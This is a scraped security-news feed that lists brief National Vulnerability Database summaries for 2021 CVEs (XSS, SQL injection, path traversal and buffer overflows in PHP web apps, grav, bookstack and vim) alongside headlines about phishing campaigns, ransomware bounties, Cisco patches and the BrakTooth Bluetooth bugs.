‼ CVE-2021-42664 ‼
📖 Read
via "National Vulnerability Database".
A Stored Cross Site Scripting (XSS) Vulneraibiilty exists in Sourcecodester Engineers Online Portal in PHP via the (1) Quiz title and (2) quiz description parameters to add_quiz.php. An attacker can leverage this vulnerability in order to run javascript commands on the web server surfers behalf, which can lead to cookie stealing and more.📖 Read
via "National Vulnerability Database".
‼ CVE-2021-42668 ‼
📖 Read
via "National Vulnerability Database".
A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter in the my_classmates.php web page.. As a result, an attacker can extract sensitive data from the web server and in some cases can use this vulnerability in order to get a remote code execution on the remote web server.📖 Read
via "National Vulnerability Database".
‼ CVE-2021-42665 ‼
📖 Read
via "National Vulnerability Database".
An SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the login form inside of index.php, which can allow an attacker to bypass authentication.📖 Read
via "National Vulnerability Database".
‼ CVE-2021-42670 ‼
📖 Read
via "National Vulnerability Database".
A SQL injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter to the announcements_student.php web page. As a result a malicious user can extract sensitive data from the web server and in some cases use this vulnerability in order to get a remote code execution on the remote web server.📖 Read
via "National Vulnerability Database".
🦿 Voice phishing attack spoofs Amazon to steal credit card information 🦿
📖 Read
via "Tech Republic".
Impersonating an Amazon order notification, the attackers end up calling victims to try to obtain their credit card details, says Avanan.📖 Read
via "Tech Republic".
TechRepublic
Voice phishing attack spoofs Amazon to steal credit card information
Impersonating an Amazon order notification, the attackers end up calling victims to try to obtain their credit card details, says Avanan.
🗓️ Cisco patches critical bug trio in Policy Suite and ONT networking devices 🗓️
📖 Read
via "The Daily Swig".
Critical severity bugs disclosed by networking titan📖 Read
via "The Daily Swig".
The Daily Swig | Cybersecurity news and views
Cisco patches critical bug trio in Policy Suite and ONT networking devices
Critical severity bugs disclosed by networking titan
❌ Proofpoint Phish Harvests Microsoft O365, Google Logins ❌
📖 Read
via "Threat Post".
A savvy campaign impersonating the cybersecurity company skated past Microsoft email security.📖 Read
via "Threat Post".
Threat Post
Proofpoint Phish Harvests Microsoft O365, Google Logins
A savvy campaign impersonating the cybersecurity company skated past Microsoft email security.
🕴 To Secure DevOps, Security Teams Must be Agile 🕴
📖 Read
via "Dark Reading".
The evolution of agile development and infrastructure-as-code has given security teams the tools they need to gain visibility, find vulnerabilities early, and continuously evaluate infrastructure.📖 Read
via "Dark Reading".
Dark Reading
To Secure DevOps, Security Teams Must be Agile
The evolution of agile development and infrastructure-as-code has given security teams the tools they need to gain visibility, find vulnerabilities early, and continuously evaluate infrastructure.
🗓️ Lessons learned: How a severe vulnerability in the OWASP ModSecurity Core Rule Set sparked much-needed change 🗓️
📖 Read
via "The Daily Swig".
Years-old WAF bypass flaw was discovered in June📖 Read
via "The Daily Swig".
The Daily Swig | Cybersecurity news and views
Lessons learned: How a severe vulnerability in the OWASP ModSecurity Core Rule Set sparked much-needed change
Years-old WAF bypass flaw was discovered in June
❌ Google Ads for Faux Cryptowallets Net Scammers At Least $500K ❌
📖 Read
via "Threat Post".
Malicious Phantom, MetaMask cryptowallets are on the prowl to drain victim funds. 📖 Read
via "Threat Post".
Threat Post
Google Ads for Faux Cryptowallets Net Scammers At Least $500K
Malicious Phantom, MetaMask cryptowallets are on the prowl to drain victim funds.
🦿 US government unveils $10 million bounty for DarkSide ransomware gang leaders 🦿
📖 Read
via "Tech Republic".
The $10 million is for intel that leads to the identification or location of anyone who holds a leadership position in the DarkSide group.📖 Read
via "Tech Republic".
TechRepublic
US government unveils $10 million bounty for DarkSide ransomware gang leaders
The $10 million is for intel that leads to the identification or location of anyone who holds a leadership position in the DarkSide group.
‼ CVE-2021-3924 ‼
📖 Read
via "National Vulnerability Database".
grav is vulnerable to Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')📖 Read
via "National Vulnerability Database".
‼ CVE-2021-3928 ‼
📖 Read
via "National Vulnerability Database".
vim is vulnerable to Stack-based Buffer Overflow📖 Read
via "National Vulnerability Database".
‼ CVE-2021-3916 ‼
📖 Read
via "National Vulnerability Database".
bookstack is vulnerable to Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')📖 Read
via "National Vulnerability Database".
‼ CVE-2021-39412 ‼
📖 Read
via "National Vulnerability Database".
Multiple Cross Site Scripting (XSS) vulnerabilities exists in PHPGurukul Shopping v3.1 via the (1) callback parameter in (a) server_side/scripts/id_jsonp.php, (b) server_side/scripts/jsonp.php, and (c) scripts/objects_jsonp.php, the (2) value parameter in examples_support/editable_ajax.php, and the (3) PHP_SELF parameter in captcha/index.php.📖 Read
via "National Vulnerability Database".
‼ CVE-2021-3927 ‼
📖 Read
via "National Vulnerability Database".
vim is vulnerable to Heap-based Buffer Overflow📖 Read
via "National Vulnerability Database".
‼ CVE-2021-39411 ‼
📖 Read
via "National Vulnerability Database".
Multiple Cross Site Scripting (XSS) vulnerabilities exist in PHPGurukul Hospital Management System 4.0 via the (1) searchdata parameter in (a) doctor/search.php and (b) admin/patient-search.php, and the (2) fromdate and (3) todate parameters in admin/betweendates-detailsreports.php.📖 Read
via "National Vulnerability Database".
🛠 Faraday 3.18.1 🛠
📖 Read
via "Packet Storm Security".
Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.📖 Read
via "Packet Storm Security".
Packetstormsecurity
Faraday 3.18.1 ≈ Packet Storm
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers
❌ Beyond the Basics: Tips for Building Advanced Ransomware Resiliency ❌
📖 Read
via "Threat Post".
Joseph Carson, chief security scientist and advisory CISO at ThycoticCentrify, offers advice on least privilege, automation, application control and more.📖 Read
via "Threat Post".
Threat Post
Beyond the Basics: Tips for Building Advanced Ransomware Resiliency
Joseph Carson, chief security scientist and advisory CISO at ThycoticCentrify, offers advice on least privilege, automation, application control and more.
❌ BrakTooth Bluetooth Bugs Bite: Exploit Code, PoC Released ❌
📖 Read
via "Threat Post".
CISA is urging vendors to patch, given the release of public exploit code & a proof of concept tool for bugs that open billions of devices – phones, PCs, toys, etc. – to DoS & code execution.📖 Read
via "Threat Post".
Threat Post
BrakTooth Bluetooth Bugs Bite: Exploit Code, PoC Released
CISA is urging vendors to patch, given the release of public exploit code & a proof of concept tool for bugs that open billions of devices – phones, PCs, toys, etc. – to DoS & code execution.
🔏 Friday Five 11/5 🔏
📖 Read
via "".
The U.S. blacklists four companies for malicious cyber activities, a ransomware group shuts down, and a new CMMC program gets revamped - catch up on the infosec news of the week with the Friday Five!📖 Read
via "".
Digital Guardian
Friday Five 11/5
$10 million for ransomware intel, four companies blacklisted for malicious cyber activities, and a new CMMC program gets revamped - catch up on the infosec news of the week with the Friday Five!